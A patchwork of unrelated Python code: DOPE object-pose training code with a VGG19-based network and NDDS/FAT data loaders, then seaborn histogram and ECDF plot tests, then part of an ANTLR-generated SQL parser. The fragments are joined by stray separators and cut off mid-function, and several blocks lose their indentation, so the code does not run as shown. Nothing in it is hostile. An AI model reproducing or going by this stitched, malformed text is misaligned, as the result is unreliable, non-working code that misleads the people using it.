Pillow==5.2.0
torchvision==0.2.1
PyYAML==3.13
"""
######################################################
"""
HOW TO TRAIN DOPE
This is the DOPE training code.
It is provided as a convenience for researchers, but it is otherwise unsupported.
Please refer to `python3 train.py --help` for specific details about the
training code.
If you download the FAT dataset
(https://research.nvidia.com/publication/2018-06_Falling-Things)
you can train a YCB object DOPE detector as follows:
```
python3 train.py --data path/to/FAT --object soup --outf soup
--gpuids 0 1 2 3 4 5 6 7
```
This will create a folder called `train_soup` where the weights will be saved
after each epoch. It will use the 8 gpus using pytorch data parallel.
"""
import argparse
import configparser
import random
import numpy as np
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.optim as optim
import torch.utils.data
import torchvision.transforms as transforms
from torch.autograd import Variable
import torch.utils.data as data
import torchvision.models as models
import datetime
import json
import glob
import os
from PIL import Image
from PIL import ImageDraw
from PIL import ImageEnhance
from math import acos
from math import sqrt
from math import pi
from os.path import exists
import cv2
import colorsys
from dope.utils import make_grid
import warnings
warnings.filterwarnings("ignore")
os.environ["CUDA_VISIBLE_DEVICES"]="0,1,2,3,4,5,6,7"
##################################################
# NEURAL NETWORK MODEL
##################################################
class DopeNetwork(nn.Module):
    """DOPE network: a truncated VGG19 feature extractor followed by six
    cascaded prediction stages.

    Each stage predicts belief maps (the ``m*_2`` heads) and affinity fields
    (the ``m*_1`` heads); stages 2..6 refine the previous stage's predictions
    using the shared image features.  Attribute names are kept as
    ``m<stage>_<head>`` for checkpoint (state_dict) compatibility.
    """
    def __init__(
            self,
            pretrained=False,
            numBeliefMap=9,
            numAffinity=16,
            stop_at_stage=6  # number of stages to process (if less than total number of stages)
        ):
        super(DopeNetwork, self).__init__()

        self.stop_at_stage = stop_at_stage

        if pretrained is False:
            print("Training network without imagenet weights.")
        else:
            print("Training network pretrained on imagenet.")

        # First 24 layers of VGG19 serve as the feature extractor.
        vgg_full = models.vgg19(pretrained=pretrained).features
        self.vgg = nn.Sequential()
        for i_layer in range(24):
            self.vgg.add_module(str(i_layer), vgg_full[i_layer])

        # Reduce the VGG output from 512 to 128 channels.
        i_layer = 23
        self.vgg.add_module(str(i_layer), nn.Conv2d(512, 256, kernel_size=3, stride=1, padding=1))
        self.vgg.add_module(str(i_layer+1), nn.ReLU(inplace=True))
        self.vgg.add_module(str(i_layer+2), nn.Conv2d(256, 128, kernel_size=3, stride=1, padding=1))
        self.vgg.add_module(str(i_layer+3), nn.ReLU(inplace=True))

        # Stages 2..6 consume the 128 image features concatenated with the
        # previous stage's belief and affinity outputs.
        cascade_channels = 128 + numBeliefMap + numAffinity

        # _2 are the belief map stages
        self.m1_2 = DopeNetwork.create_stage(128, numBeliefMap, True)
        self.m2_2 = DopeNetwork.create_stage(cascade_channels, numBeliefMap, False)
        self.m3_2 = DopeNetwork.create_stage(cascade_channels, numBeliefMap, False)
        self.m4_2 = DopeNetwork.create_stage(cascade_channels, numBeliefMap, False)
        self.m5_2 = DopeNetwork.create_stage(cascade_channels, numBeliefMap, False)
        self.m6_2 = DopeNetwork.create_stage(cascade_channels, numBeliefMap, False)

        # _1 are the affinity map stages
        self.m1_1 = DopeNetwork.create_stage(128, numAffinity, True)
        self.m2_1 = DopeNetwork.create_stage(cascade_channels, numAffinity, False)
        self.m3_1 = DopeNetwork.create_stage(cascade_channels, numAffinity, False)
        self.m4_1 = DopeNetwork.create_stage(cascade_channels, numAffinity, False)
        self.m5_1 = DopeNetwork.create_stage(cascade_channels, numAffinity, False)
        self.m6_1 = DopeNetwork.create_stage(cascade_channels, numAffinity, False)

    def forward(self, x):
        '''Runs inference on the neural network.

        Returns a pair of lists ``(belief_maps, affinity_fields)`` with one
        tensor per executed stage.  As in the original cascade, a
        ``stop_at_stage`` of 1..5 truncates the cascade; any other value
        runs all six stages.
        '''
        features = self.vgg(x)

        belief_heads = [self.m1_2, self.m2_2, self.m3_2, self.m4_2, self.m5_2, self.m6_2]
        affinity_heads = [self.m1_1, self.m2_1, self.m3_1, self.m4_1, self.m5_1, self.m6_1]
        total_stages = len(belief_heads)

        beliefs = [belief_heads[0](features)]
        affinities = [affinity_heads[0](features)]

        # Values outside 1..5 (including 6) run the full cascade, matching
        # the original unrolled control flow.
        last = self.stop_at_stage if 1 <= self.stop_at_stage < total_stages else total_stages
        for stage in range(1, last):
            combined = torch.cat([beliefs[-1], affinities[-1], features], 1)
            beliefs.append(belief_heads[stage](combined))
            affinities.append(affinity_heads[stage](combined))

        return beliefs, affinities

    @staticmethod
    def create_stage(in_channels, out_channels, first=False):
        '''Create the neural network layers for a single stage.

        The first stage uses 3x3 kernels and fewer layers; later stages use
        7x7 kernels (larger receptive field) and more layers.  Spatial
        resolution is preserved throughout.
        '''
        model = nn.Sequential()
        mid_channels = 128
        if first:
            padding = 1
            kernel = 3
            count = 6
            final_channels = 512
        else:
            padding = 3
            kernel = 7
            count = 10
            final_channels = mid_channels

        # First convolution
        model.add_module("0",
                         nn.Conv2d(
                             in_channels,
                             mid_channels,
                             kernel_size=kernel,
                             stride=1,
                             padding=padding)
                         )

        # Middle convolutions (ReLU/Conv pairs)
        i = 1
        while i < count - 1:
            model.add_module(str(i), nn.ReLU(inplace=True))
            i += 1
            model.add_module(str(i),
                             nn.Conv2d(
                                 mid_channels,
                                 mid_channels,
                                 kernel_size=kernel,
                                 stride=1,
                                 padding=padding))
            i += 1

        # Penultimate convolution (1x1)
        model.add_module(str(i), nn.ReLU(inplace=True))
        i += 1
        model.add_module(str(i), nn.Conv2d(mid_channels, final_channels, kernel_size=1, stride=1))
        i += 1

        # Last convolution (1x1 projection to the output maps)
        model.add_module(str(i), nn.ReLU(inplace=True))
        i += 1
        model.add_module(str(i), nn.Conv2d(final_channels, out_channels, kernel_size=1, stride=1))
        i += 1

        return model
##################################################
# UTILS CODE FOR LOADING THE DATA
##################################################
def default_loader(path):
    """Open the image file at *path* and return it converted to RGB."""
    img = Image.open(path)
    return img.convert('RGB')
def loadjson(path, objectsofinterest, img):
    """
    Loads the annotation data from a json file.

    Parameters
    ----------
    path : str
        Path to the NDDS/FAT-style json annotation file.
    objectsofinterest : str or None
        If given, only objects whose (lowercased) class name contains this
        substring are loaded; if None, all objects are loaded.
    img : unused
        Kept for interface compatibility with other loaders.

    Returns
    -------
    dict with keys 'pointsBelief', 'rotations', 'translations', 'centroids',
    'points', 'keypoints_2d', 'keypoints_3d'.  The keypoint lists are always
    empty for this format.
    """
    with open(path) as data_file:
        data = json.load(data_file)

    pointsBelief = []
    points_keypoints_3d = []
    points_keypoints_2d = []
    centroids = []
    translations = []
    rotations = []
    points = []

    for info in data['objects']:
        # Optionally filter by class-name substring.
        if objectsofinterest is not None and \
           objectsofinterest not in info['class'].lower():
            continue

        # Projected 3d bounding box corners plus the projected centroid,
        # used to build the belief maps.
        points3d = [(p[0], p[1]) for p in info['projected_cuboid']]
        pcenter = info['projected_cuboid_centroid']
        points3d.append((pcenter[0], pcenter[1]))
        pointsBelief.append(points3d)

        # NOTE: the centroid is deliberately appended a second time here so
        # each entry has 10 points (8 corners + centroid x2), matching the
        # zeros(1, 10, 2) fallback used by the dataset when no objects match.
        points.append(points3d + [(pcenter[0], pcenter[1])])
        centroids.append((pcenter[0], pcenter[1]))

        # Object pose: translation vector and xyzw quaternion.
        location = info['location']
        translations.append([location[0], location[1], location[2]])
        rotations.append(info["quaternion_xyzw"])

    return {
        "pointsBelief":pointsBelief,
        "rotations":rotations,
        "translations":translations,
        "centroids":centroids,
        "points":points,
        "keypoints_2d":points_keypoints_2d,
        "keypoints_3d":points_keypoints_3d,
        }
def loadimages(root):
    """
    Recursively find all png/jpg images under ``root`` that have a matching
    same-stem .json annotation file.

    Returns a list of tuples (image_path, image_filename, json_path).
    Only leaf directories (those with no subdirectories) are scanned, as in
    the NDDS/FAT dataset layout.
    """
    imgs = []

    def add_json_files(path):
        # Pair each image with its annotation.  The json path is derived by
        # swapping only the file extension (not a blind substring replace,
        # which broke when 'png'/'jpg' or the root string occurred elsewhere
        # in the path), and the stored name is the plain basename.
        for ext in ("png", "jpg"):
            for imgpath in glob.glob(path + "/*." + ext):
                jsonpath = imgpath[:-len(ext)] + "json"
                if exists(imgpath) and exists(jsonpath):
                    imgs.append((imgpath, os.path.basename(imgpath), jsonpath))

    def explore(path):
        if not os.path.isdir(path):
            return
        folders = [os.path.join(path, o) for o in os.listdir(path)
                   if os.path.isdir(os.path.join(path, o))]
        if len(folders) > 0:
            for path_entry in folders:
                explore(path_entry)
        else:
            # Leaf directory: this is where image/annotation pairs live.
            add_json_files(path)

    explore(root)
    return imgs
class MultipleVertexJson(data.Dataset):
"""
Dataloader for the data generated by NDDS (https://github.com/NVIDIA/Dataset_Synthesizer).
This is the same data as the data used in FAT.
"""
    def __init__(self, root,transform=None, nb_vertex = 8,
                 keep_orientation = True,
                 normal = None, test=False,
                 target_transform = None,
                 loader = default_loader,
                 objectsofinterest = "",
                 img_size = 400,
                 save = False,
                 noise = 2,
                 data_size = None,
                 sigma = 16,
                 random_translation = (25.0,25.0),
                 random_rotation = 15.0,
                 ):
        """Index all image/annotation pairs found under ``root``.

        Parameters are stored verbatim on the instance: ``data_size`` caps
        the reported dataset length (see ``__len__``); ``objectsofinterest``
        filters annotations by class name; ``loader`` opens images.
        NOTE(review): ``sigma``, ``noise``, ``random_translation`` and
        ``random_rotation`` are presumably augmentation/belief-map settings
        consumed by ``__getitem__`` -- confirm there.
        NOTE(review): ``nb_vertex`` and ``keep_orientation`` are accepted but
        ``nb_vertex`` is never stored -- confirm whether it is still used.
        """
        ###################
        self.objectsofinterest = objectsofinterest
        self.img_size = img_size
        self.loader = loader
        self.transform = transform
        self.target_transform = target_transform
        self.root = root
        self.imgs = []
        self.test = test
        self.normal = normal
        self.keep_orientation = keep_orientation
        self.save = save
        self.noise = noise
        self.data_size = data_size
        self.sigma = sigma
        self.random_translation = random_translation
        self.random_rotation = random_rotation

        def load_data(path):
            '''Recursively load the data. This is useful to load all of the FAT dataset.'''
            imgs = loadimages(path)

            # Check all the folders in path
            for name in os.listdir(str(path)):
                imgs += loadimages(path +"/"+name)
            return imgs

        self.imgs = load_data(root)

        # Shuffle the data, this is useful when we want to use a subset.
        np.random.shuffle(self.imgs)
def __len__(self):
# When limiting the number of data
if not self.data_size is None:
return int(self.data_size)
return len(self.imgs)
def __getitem__(self, index):
"""
Depending on how the data loader is configured,
this will return the debug info with the cuboid drawn on it,
this happens when self.save is set to true.
Otherwise, during training this function returns the
belief maps and affinity fields and image as tensors.
"""
path, name, txt = self.imgs[index]
img = self.loader(path)
img_size = img.size
img_size = (400,400)
loader = loadjson
data = loader(txt, self.objectsofinterest,img)
pointsBelief = data['pointsBelief']
objects_centroid = data['centroids']
points_all = data['points']
points_keypoints = data['keypoints_2d']
translations = torch.from_numpy(np.array(
data['translations'])).float()
rotations = torch.from_numpy(np.array(
data['rotations'])).float()
if len(points_all) == 0:
points_all = torch.zeros(1, 10, 2).double()
# self.save == true assumes there is only
# one object instance in the scene.
if translations.size()[0] > 1:
translations = translations[0].unsqueeze(0)
rotations = rotations[0].unsqueeze(0)
# If there are no objects, still need to return similar shape array
if len(translations) == 0:
translations = torch.zeros(1,3).float()
rotations = torch.zeros(1,4).float()
# Camera intrinsics
path_cam = path.replace(name,'_camera_settings.json')
with open(path_cam) as data_file:
data = json.load(data_file)
# Assumes one camera
cam = data['camera_settings'][0]['intrinsic_settings']
matrix_camera = np.zeros((3,3))
matrix_camera[0,0] = cam['fx']
matrix_camera[1,1] = cam['fy']
matrix_camera[0,2] = cam['cx']
matrix_camera[1,2] = cam['cy']
matrix_camera[2,2] = 1
# Load | |
= 10
histplot(flat_series, element="bars", fill=False, bins=n, ax=ax1)
histplot(flat_series, element="poly", fill=False, bins=n, ax=ax2)
bar_heights = np.array([b.get_height() for b in ax1.patches])
bar_widths = np.array([b.get_width() for b in ax1.patches])
bar_edges = np.array([b.get_x() for b in ax1.patches])
x, y = ax2.lines[0].get_xydata().T
assert_array_equal(x, bar_edges + bar_widths / 2)
assert_array_equal(y, bar_heights)
def test_step_no_fill(self, flat_series):
f, (ax1, ax2) = plt.subplots(2)
histplot(flat_series, element="bars", fill=False, ax=ax1)
histplot(flat_series, element="step", fill=False, ax=ax2)
bar_heights = [b.get_height() for b in ax1.patches]
bar_widths = [b.get_width() for b in ax1.patches]
bar_edges = [b.get_x() for b in ax1.patches]
x, y = ax2.lines[0].get_xydata().T
assert_array_equal(x[:-1], bar_edges)
assert_array_equal(y[:-1], bar_heights)
assert x[-1] == bar_edges[-1] + bar_widths[-1]
assert y[-1] == y[-2]
def test_step_fill_xy(self, flat_series):
f, ax = plt.subplots()
histplot(x=flat_series, element="step", fill=True)
histplot(y=flat_series, element="step", fill=True)
xverts = ax.collections[0].get_paths()[0].vertices
yverts = ax.collections[1].get_paths()[0].vertices
assert_array_equal(xverts, yverts[:, ::-1])
def test_step_no_fill_xy(self, flat_series):
f, ax = plt.subplots()
histplot(x=flat_series, element="step", fill=False)
histplot(y=flat_series, element="step", fill=False)
xline, yline = ax.lines
assert_array_equal(xline.get_xdata(), yline.get_ydata())
assert_array_equal(xline.get_ydata(), yline.get_xdata())
def test_weighted_histogram(self):
ax = histplot(x=[0, 1, 2], weights=[1, 2, 3], discrete=True)
bar_heights = [b.get_height() for b in ax.patches]
assert bar_heights == [1, 2, 3]
    def test_weights_with_auto_bins(self, long_df):
        # Using weights with automatic binning should emit a UserWarning and
        # still produce a histogram (10 bars observed here).
        with pytest.warns(UserWarning):
            ax = histplot(long_df, x="x", weights="f")
        assert len(ax.patches) == 10
def test_shrink(self, long_df):
bw = 2
shrink = .5
ax = histplot(long_df, x="x", binwidth=bw, shrink=shrink)
assert ax.patches[0].get_width() == bw * shrink
def test_log_scale_explicit(self, rng):
x = rng.lognormal(0, 2, 1000)
ax = histplot(x, log_scale=True, binwidth=1)
bar_widths = [b.get_width() for b in ax.patches]
steps = np.divide(bar_widths[1:], bar_widths[:-1])
assert np.allclose(steps, 10)
def test_log_scale_implicit(self, rng):
x = rng.lognormal(0, 2, 1000)
f, ax = plt.subplots()
ax.set_xscale("log")
histplot(x, binwidth=1, ax=ax)
bar_widths = [b.get_width() for b in ax.patches]
steps = np.divide(bar_widths[1:], bar_widths[:-1])
assert np.allclose(steps, 10)
@pytest.mark.parametrize(
"fill", [True, False],
)
def test_auto_linewidth(self, flat_series, fill):
get_lw = lambda ax: ax.patches[0].get_linewidth() # noqa: E731
kws = dict(element="bars", fill=fill)
f, (ax1, ax2) = plt.subplots(2)
histplot(flat_series, **kws, bins=10, ax=ax1)
histplot(flat_series, **kws, bins=100, ax=ax2)
assert get_lw(ax1) > get_lw(ax2)
f, ax1 = plt.subplots(figsize=(10, 5))
f, ax2 = plt.subplots(figsize=(2, 5))
histplot(flat_series, **kws, bins=30, ax=ax1)
histplot(flat_series, **kws, bins=30, ax=ax2)
assert get_lw(ax1) > get_lw(ax2)
def test_bar_kwargs(self, flat_series):
    """Extra artist kwargs (ec, lw) propagate to every bar patch."""
    linewidth = 2
    edgecolor = (1, .2, .9, .5)
    ax = histplot(flat_series, binwidth=1, ec=edgecolor, lw=linewidth)
    for patch in ax.patches:
        assert_colors_equal(patch.get_edgecolor(), edgecolor)
        assert patch.get_linewidth() == linewidth
def test_step_fill_kwargs(self, flat_series):
    """Artist kwargs propagate to the filled step polygon."""
    linewidth = 2
    edgecolor = (1, .2, .9, .5)
    ax = histplot(flat_series, element="step", ec=edgecolor, lw=linewidth)
    poly = ax.collections[0]
    assert_colors_equal(poly.get_edgecolor(), edgecolor)
    assert poly.get_linewidth() == linewidth
def test_step_line_kwargs(self, flat_series):
    """Artist kwargs propagate to the unfilled step line."""
    linewidth, linestyle = 2, "--"
    ax = histplot(
        flat_series, element="step", fill=False, lw=linewidth, ls=linestyle,
    )
    line = ax.lines[0]
    assert line.get_linewidth() == linewidth
    assert line.get_linestyle() == linestyle
class TestHistPlotBivariate:
    """Tests for bivariate histplot: 2D histograms drawn as a pcolormesh.

    Throughout, the drawn mesh is compared against a direct Histogram()
    computation. Note the transposes (counts.T): pcolormesh stores rows
    along y and columns along x.
    """

    def test_mesh(self, long_df):
        hist = Histogram()
        counts, (x_edges, y_edges) = hist(long_df["x"], long_df["y"])
        ax = histplot(long_df, x="x", y="y")
        mesh = ax.collections[0]
        mesh_data = mesh.get_array()
        assert_array_equal(mesh_data.data, counts.T.flat)
        # Zero-count cells are masked (not drawn) by default.
        assert_array_equal(mesh_data.mask, counts.T.flat == 0)
        # Each cell's first path vertex sits on its (x, y) bin corner.
        edges = itertools.product(y_edges[:-1], x_edges[:-1])
        for i, (y, x) in enumerate(edges):
            path = mesh.get_paths()[i]
            assert path.vertices[0, 0] == x
            assert path.vertices[0, 1] == y

    def test_mesh_with_hue(self, long_df):
        ax = histplot(long_df, x="x", y="y", hue="c")
        hist = Histogram()
        # Default common_bins: one shared edge grid across hue levels.
        hist.define_bin_edges(long_df["x"], long_df["y"])
        # NOTE(review): indexing ax.collections by the groupby key assumes
        # the "c" column holds 0..n-1 integer levels — confirm via fixture.
        for i, sub_df in long_df.groupby("c"):
            mesh = ax.collections[i]
            mesh_data = mesh.get_array()
            counts, (x_edges, y_edges) = hist(sub_df["x"], sub_df["y"])
            assert_array_equal(mesh_data.data, counts.T.flat)
            assert_array_equal(mesh_data.mask, counts.T.flat == 0)
            edges = itertools.product(y_edges[:-1], x_edges[:-1])
            for i, (y, x) in enumerate(edges):
                path = mesh.get_paths()[i]
                assert path.vertices[0, 0] == x
                assert path.vertices[0, 1] == y

    def test_mesh_with_hue_unique_bins(self, long_df):
        # common_bins=False: each hue level computes its own edges, so a
        # fresh Histogram per subset reproduces them.
        ax = histplot(long_df, x="x", y="y", hue="c", common_bins=False)
        for i, sub_df in long_df.groupby("c"):
            hist = Histogram()
            mesh = ax.collections[i]
            mesh_data = mesh.get_array()
            counts, (x_edges, y_edges) = hist(sub_df["x"], sub_df["y"])
            assert_array_equal(mesh_data.data, counts.T.flat)
            assert_array_equal(mesh_data.mask, counts.T.flat == 0)
            edges = itertools.product(y_edges[:-1], x_edges[:-1])
            for i, (y, x) in enumerate(edges):
                path = mesh.get_paths()[i]
                assert path.vertices[0, 0] == x
                assert path.vertices[0, 1] == y

    def test_mesh_log_scale(self, rng):
        x, y = rng.lognormal(0, 1, (2, 1000))
        hist = Histogram()
        # Binning happens in log10 space; drawn vertices are in data space.
        counts, (x_edges, y_edges) = hist(np.log10(x), np.log10(y))
        ax = histplot(x=x, y=y, log_scale=True)
        mesh = ax.collections[0]
        mesh_data = mesh.get_array()
        assert_array_equal(mesh_data.data, counts.T.flat)
        edges = itertools.product(y_edges[:-1], x_edges[:-1])
        for i, (y_i, x_i) in enumerate(edges):
            path = mesh.get_paths()[i]
            assert path.vertices[0, 0] == 10 ** x_i
            assert path.vertices[0, 1] == 10 ** y_i

    def test_mesh_thresh(self, long_df):
        hist = Histogram()
        counts, (x_edges, y_edges) = hist(long_df["x"], long_df["y"])
        thresh = 5
        ax = histplot(long_df, x="x", y="y", thresh=thresh)
        mesh = ax.collections[0]
        mesh_data = mesh.get_array()
        assert_array_equal(mesh_data.data, counts.T.flat)
        # Cells at or below the threshold are masked out.
        assert_array_equal(mesh_data.mask, (counts <= thresh).T.flat)

    def test_mesh_sticky_edges(self, long_df):
        # thresh=None draws every cell, so the mesh can claim sticky
        # edges at the data extremes; with the default thresh it cannot.
        ax = histplot(long_df, x="x", y="y", thresh=None)
        mesh = ax.collections[0]
        assert mesh.sticky_edges.x == [long_df["x"].min(), long_df["x"].max()]
        assert mesh.sticky_edges.y == [long_df["y"].min(), long_df["y"].max()]
        ax.clear()
        ax = histplot(long_df, x="x", y="y")
        mesh = ax.collections[0]
        assert not mesh.sticky_edges.x
        assert not mesh.sticky_edges.y

    def test_mesh_common_norm(self, long_df):
        # common_norm=True: each subset's density is scaled by its share
        # of the full dataset.
        stat = "density"
        ax = histplot(
            long_df, x="x", y="y", hue="c", common_norm=True, stat=stat,
        )
        hist = Histogram(stat="density")
        hist.define_bin_edges(long_df["x"], long_df["y"])
        for i, sub_df in long_df.groupby("c"):
            mesh = ax.collections[i]
            mesh_data = mesh.get_array()
            density, (x_edges, y_edges) = hist(sub_df["x"], sub_df["y"])
            scale = len(sub_df) / len(long_df)
            assert_array_equal(mesh_data.data, (density * scale).T.flat)

    def test_mesh_unique_norm(self, long_df):
        # common_norm=False: each subset normalizes independently, but
        # still on the shared bin grid.
        stat = "density"
        ax = histplot(
            long_df, x="x", y="y", hue="c", common_norm=False, stat=stat,
        )
        hist = Histogram()
        hist.define_bin_edges(long_df["x"], long_df["y"])
        for i, sub_df in long_df.groupby("c"):
            sub_hist = Histogram(bins=hist.bin_edges, stat=stat)
            mesh = ax.collections[i]
            mesh_data = mesh.get_array()
            density, (x_edges, y_edges) = sub_hist(sub_df["x"], sub_df["y"])
            assert_array_equal(mesh_data.data, density.T.flat)

    @pytest.mark.parametrize("stat", ["probability", "percent"])
    def test_mesh_normalization(self, long_df, stat):
        ax = histplot(
            long_df, x="x", y="y", stat=stat,
        )
        mesh_data = ax.collections[0].get_array()
        expected_sum = {"probability": 1, "percent": 100}[stat]
        assert mesh_data.data.sum() == expected_sum

    def test_mesh_colors(self, long_df):
        # A scalar color becomes a single-color luminance cmap; hue maps
        # each level to a cmap built from the default palette.
        color = "r"
        f, ax = plt.subplots()
        histplot(
            long_df, x="x", y="y", color=color,
        )
        mesh = ax.collections[0]
        assert_array_equal(
            mesh.get_cmap().colors,
            _DistributionPlotter()._cmap_from_color(color).colors,
        )
        f, ax = plt.subplots()
        histplot(
            long_df, x="x", y="y", hue="c",
        )
        colors = color_palette()
        for i, mesh in enumerate(ax.collections):
            assert_array_equal(
                mesh.get_cmap().colors,
                _DistributionPlotter()._cmap_from_color(colors[i]).colors,
            )

    def test_color_limits(self, long_df):
        f, (ax1, ax2, ax3) = plt.subplots(3)
        kws = dict(data=long_df, x="x", y="y")
        hist = Histogram()
        counts, _ = hist(long_df["x"], long_df["y"])

        # Default clim spans 0 .. max count.
        histplot(**kws, ax=ax1)
        assert ax1.collections[0].get_clim() == (0, counts.max())

        # Explicit vmax overrides the upper limit.
        vmax = 10
        histplot(**kws, vmax=vmax, ax=ax2)
        counts, _ = hist(long_df["x"], long_df["y"])
        assert ax2.collections[0].get_clim() == (0, vmax)

        # pmax/pthresh are quantile-based: clim and mask come from
        # _quantile_to_level applied to the count array.
        pmax = .8
        pthresh = .1
        f = _DistributionPlotter()._quantile_to_level
        histplot(**kws, pmax=pmax, pthresh=pthresh, ax=ax3)
        counts, _ = hist(long_df["x"], long_df["y"])
        mesh = ax3.collections[0]
        assert mesh.get_clim() == (0, f(counts, pmax))
        assert_array_equal(
            mesh.get_array().mask,
            (counts <= f(counts, pthresh)).T.flat,
        )

    def test_hue_color_limits(self, long_df):
        _, (ax1, ax2, ax3, ax4) = plt.subplots(4)
        kws = dict(data=long_df, x="x", y="y", hue="c", bins=4)
        hist = Histogram(bins=kws["bins"])
        hist.define_bin_edges(long_df["x"], long_df["y"])
        full_counts, _ = hist(long_df["x"], long_df["y"])
        sub_counts = []
        for _, sub_df in long_df.groupby(kws["hue"]):
            c, _ = hist(sub_df["x"], sub_df["y"])
            sub_counts.append(c)
        pmax = .8
        pthresh = .05
        f = _DistributionPlotter()._quantile_to_level

        # common_norm=True: all hue levels share the full-data clim.
        histplot(**kws, common_norm=True, ax=ax1)
        for i, mesh in enumerate(ax1.collections):
            assert mesh.get_clim() == (0, full_counts.max())

        # common_norm=False: each level's clim uses its own counts.
        histplot(**kws, common_norm=False, ax=ax2)
        for i, mesh in enumerate(ax2.collections):
            assert mesh.get_clim() == (0, sub_counts[i].max())

        # Quantile limits computed on full counts when common_norm=True...
        histplot(**kws, common_norm=True, pmax=pmax, pthresh=pthresh, ax=ax3)
        for i, mesh in enumerate(ax3.collections):
            assert mesh.get_clim() == (0, f(full_counts, pmax))
            assert_array_equal(
                mesh.get_array().mask,
                (sub_counts[i] <= f(full_counts, pthresh)).T.flat,
            )

        # ...and per-subset when common_norm=False.
        histplot(**kws, common_norm=False, pmax=pmax, pthresh=pthresh, ax=ax4)
        for i, mesh in enumerate(ax4.collections):
            assert mesh.get_clim() == (0, f(sub_counts[i], pmax))
            assert_array_equal(
                mesh.get_array().mask,
                (sub_counts[i] <= f(sub_counts[i], pthresh)).T.flat,
            )

    def test_colorbar(self, long_df):
        # cbar=True adds a colorbar axes; with cbar_ax supplied no extra
        # axes is created.
        f, ax = plt.subplots()
        histplot(long_df, x="x", y="y", cbar=True, ax=ax)
        assert len(ax.figure.axes) == 2
        f, (ax, cax) = plt.subplots(2)
        histplot(long_df, x="x", y="y", cbar=True, cbar_ax=cax, ax=ax)
        assert len(ax.figure.axes) == 2
class TestECDFPlotUnivariate(SharedAxesLevelTests):
func = staticmethod(ecdfplot)
def get_last_color(self, ax):
    """Return the RGB color of the most recently drawn line."""
    last_line = ax.lines[-1]
    return to_rgb(last_line.get_color())
@pytest.mark.parametrize("variable", ["x", "y"])
def test_long_vectors(self, long_df, variable):
    """Column name, Series, ndarray, and list inputs all draw the same curve."""
    vector = long_df[variable]
    inputs = [variable, vector, vector.to_numpy(), vector.to_list()]

    f, ax = plt.subplots()
    for data in inputs:
        ecdfplot(data=long_df, ax=ax, **{variable: data})

    # All pairs of drawn curves must coincide exactly.
    xdata = [line.get_xdata() for line in ax.lines]
    for a, b in itertools.product(xdata, xdata):
        assert_array_equal(a, b)
    ydata = [line.get_ydata() for line in ax.lines]
    for a, b in itertools.product(ydata, ydata):
        assert_array_equal(a, b)
def test_hue(self, long_df):
    """Hue levels use successive default-palette colors; reversed line
    order matches the draw order."""
    ax = ecdfplot(long_df, x="x", hue="a")
    for line, expected in zip(ax.lines[::-1], color_palette()):
        assert_colors_equal(line.get_color(), expected)
def test_line_kwargs(self, long_df):
    """color/ls/lw keyword args reach every drawn line."""
    kws = dict(color="r", ls="--", lw=3)
    ax = ecdfplot(long_df, x="x", **kws)
    for line in ax.lines:
        assert_colors_equal(line.get_color(), kws["color"])
        assert line.get_linestyle() == kws["ls"]
        assert line.get_linewidth() == kws["lw"]
@pytest.mark.parametrize("data_var", ["x", "y"])
def test_drawstyle(self, flat_series, data_var):
    """ECDF steps are post-oriented for x data, pre-oriented for y data."""
    ax = ecdfplot(**{data_var: flat_series})
    expected = {"x": "steps-post", "y": "steps-pre"}[data_var]
    assert ax.lines[0].get_drawstyle() == expected
@pytest.mark.parametrize(
    "data_var,stat_var", [["x", "y"], ["y", "x"]],
)
def test_proportion_limits(self, flat_series, data_var, stat_var):
    """The proportion axis spans exactly [0, 1], with sticky edges set."""
    ax = ecdfplot(**{data_var: flat_series})
    stat_values = getattr(ax.lines[0], f"get_{stat_var}data")()
    assert stat_values[0] == 0
    assert stat_values[-1] == 1
    sticky = getattr(ax.lines[0].sticky_edges, stat_var)
    assert sticky[:] == [0, 1]
@pytest.mark.parametrize(
"data_var,stat_var", [["x", "y"], ["y", "x"]],
)
def | |
localctx = SQLGramaticaParser.ShowColumnsContext(self, self._ctx, self.state)
self.enterRule(localctx, 56, self.RULE_showColumns)
try:
self.enterOuterAlt(localctx, 1)
self.state = 401
self.match(SQLGramaticaParser.SHOW)
self.state = 402
self.match(SQLGramaticaParser.COLUMNS)
self.state = 403
self.match(SQLGramaticaParser.FROM)
self.state = 404
self.match(SQLGramaticaParser.IDX)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class InsertIntoContext(ParserRuleContext):
    """Parse-tree node for the `insertInto` rule (ANTLR-generated).

    Token accessors taking an index return the i-th occurrence; with
    i=None they return the full list of matched tokens/contexts.
    """

    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.InsertIntoContext, self).__init__(parent, invokingState)
        self.parser = parser

    def INSERT(self):
        return self.getToken(SQLGramaticaParser.INSERT, 0)

    def INTO(self):
        return self.getToken(SQLGramaticaParser.INTO, 0)

    def IDX(self, i=None):
        # Table name plus column names are all IDX tokens.
        if i is None:
            return self.getTokens(SQLGramaticaParser.IDX)
        else:
            return self.getToken(SQLGramaticaParser.IDX, i)

    def VALUES(self):
        return self.getToken(SQLGramaticaParser.VALUES, 0)

    def literal(self, i=None):
        if i is None:
            return self.getTypedRuleContexts(SQLGramaticaParser.LiteralContext)
        else:
            return self.getTypedRuleContext(SQLGramaticaParser.LiteralContext,i)

    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_insertInto

    def enterRule(self, listener):
        # Dispatch only if the listener implements the hook.
        if hasattr(listener, "enterInsertInto"):
            listener.enterInsertInto(self)

    def exitRule(self, listener):
        if hasattr(listener, "exitInsertInto"):
            listener.exitInsertInto(self)

    def accept(self, visitor):
        if hasattr(visitor, "visitInsertInto"):
            return visitor.visitInsertInto(self)
        else:
            return visitor.visitChildren(self)
def insertInto(self):
    """ANTLR-generated rule method.

    Grammar shape: INSERT INTO IDX '(' IDX (',' IDX)* ')'
                   VALUES '(' literal (',' literal)* ')'.
    The self.state numbers come from the generated ATN and must not be
    edited by hand.
    """
    localctx = SQLGramaticaParser.InsertIntoContext(self, self._ctx, self.state)
    self.enterRule(localctx, 58, self.RULE_insertInto)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 406
        self.match(SQLGramaticaParser.INSERT)
        self.state = 407
        self.match(SQLGramaticaParser.INTO)
        self.state = 408
        self.match(SQLGramaticaParser.IDX)
        self.state = 409
        self.match(SQLGramaticaParser.T__2)
        self.state = 410
        self.match(SQLGramaticaParser.IDX)
        self.state = 415
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Zero or more additional comma-separated column names.
